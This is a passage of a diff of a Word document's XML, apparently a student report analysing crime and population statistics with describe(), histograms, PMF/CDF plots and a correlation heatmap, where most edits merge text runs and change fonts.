-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t>, we can get important information from the result</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>sing the method describe, we can get important information from the result</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
@@ -8732,47 +8536,11 @@
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
         </w:rPr>
-        <w:t>Applyiing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t>the .describe</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">() method on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Applyiing the .describe() method on crime_df:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8854,7 +8622,6 @@
                               </w:rPr>
                               <w:t xml:space="preserve">From this </w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -8871,7 +8638,6 @@
                               </w:rPr>
                               <w:t>describe</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -8990,7 +8756,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="40E1CC9B" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:167.4pt;margin-top:2.1pt;width:326.1pt;height:121.4pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="40E1CC9B" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:167.4pt;margin-top:2.1pt;width:326.1pt;height:121.4pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -9012,7 +8778,6 @@
                         </w:rPr>
                         <w:t xml:space="preserve">From this </w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -9029,7 +8794,6 @@
                         </w:rPr>
                         <w:t>describe</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -9223,7 +8987,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Histograms provide a visual representation of the distribution of </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9254,9 +9017,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9271,7 +9033,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>it is useful f</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9287,7 +9049,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>it is useful f</w:t>
+        <w:t>or understanding the characteristics of your data</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9303,9 +9065,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>or understanding the characteristics of your data</w:t>
-      </w:r>
-      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9319,33 +9086,11 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="449CA885" wp14:editId="5499C689">
             <wp:extent cx="4060874" cy="2460625"/>
@@ -9420,14 +9165,38 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 05 – histogram of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
+        <w:t>Figure 05 – histogram of crime_df</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -9439,37 +9208,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Insights:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9483,8 +9223,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>There are some insights that you can get from the bin plot:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9498,14 +9244,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>There are some insights that you can get from the bin plot:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9519,8 +9259,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9534,14 +9280,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9555,8 +9295,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9570,27 +9316,6 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -9635,21 +9360,8 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Pmf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Cdf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
+      <w:r>
+        <w:t>Pmf and Cdf are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9684,15 +9396,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Before getting the PMF and CDF information, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> important to prepare the dataset.</w:t>
+        <w:t>Before getting the PMF and CDF information, its important to prepare the dataset.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9725,6 +9429,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7109AA25" wp14:editId="30836D73">
             <wp:extent cx="3748088" cy="1673378"/>
@@ -9780,7 +9485,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">The best approach to </w:t>
       </w:r>
       <w:r>
@@ -9843,6 +9547,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
@@ -9936,21 +9641,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>pmi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> pmi</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10058,6 +9750,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60AFB009" wp14:editId="58CFEC44">
             <wp:extent cx="5534343" cy="1471729"/>
@@ -10164,19 +9857,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">The least common crime type is 34, "Infanticide", with probability of 2.08e-07 or </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>0.000000208</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The least common crime type is 34, "Infanticide", with probability of 2.08e-07 or 0.000000208</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10196,28 +9878,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">The distribution of crime types is skewed, with a few </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>crime</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> types accounting for a large proportion of the total number of crimes.</w:t>
+        <w:t>The distribution of crime types is skewed, with a few crime types accounting for a large proportion of the total number of crimes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10373,17 +10034,8 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">CDF of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>CDF of crime_df</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10404,6 +10056,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Insights from the CDF:</w:t>
       </w:r>
     </w:p>
@@ -10493,10 +10146,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">To compare population growth and crime rates, we will filter the population </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>To compare population growth and crime rates, we will filter the population dataframe to extract total population figures between 2003 and 2023, excluding regional data. We must then multiply the</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -10510,9 +10167,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>dataframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10527,43 +10182,6 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> to extract total population figures between 2003 and 2023, excluding regional data. We must then multiply the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> population by 1000 to account for the fact that the population is shown in thousands and crimes are shown in units.</w:t>
       </w:r>
     </w:p>
@@ -10696,28 +10314,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 08 – Line Chart comparing crime rate and population </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>growth</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Figure 08 – Line Chart comparing crime rate and population growth</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10857,6 +10455,7 @@
           <w:bCs/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Heatmap</w:t>
       </w:r>
     </w:p>
@@ -10928,27 +10527,7 @@
           <w:iCs/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 08 – Heatmap correlation coefficient </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>popularion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and crime</w:t>
+        <w:t>Figure 08 – Heatmap correlation coefficient popularion and crime</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10970,7 +10549,6 @@
           <w:bCs/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Insight</w:t>
       </w:r>
     </w:p>
@@ -10994,30 +10572,22 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading"/>
         <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
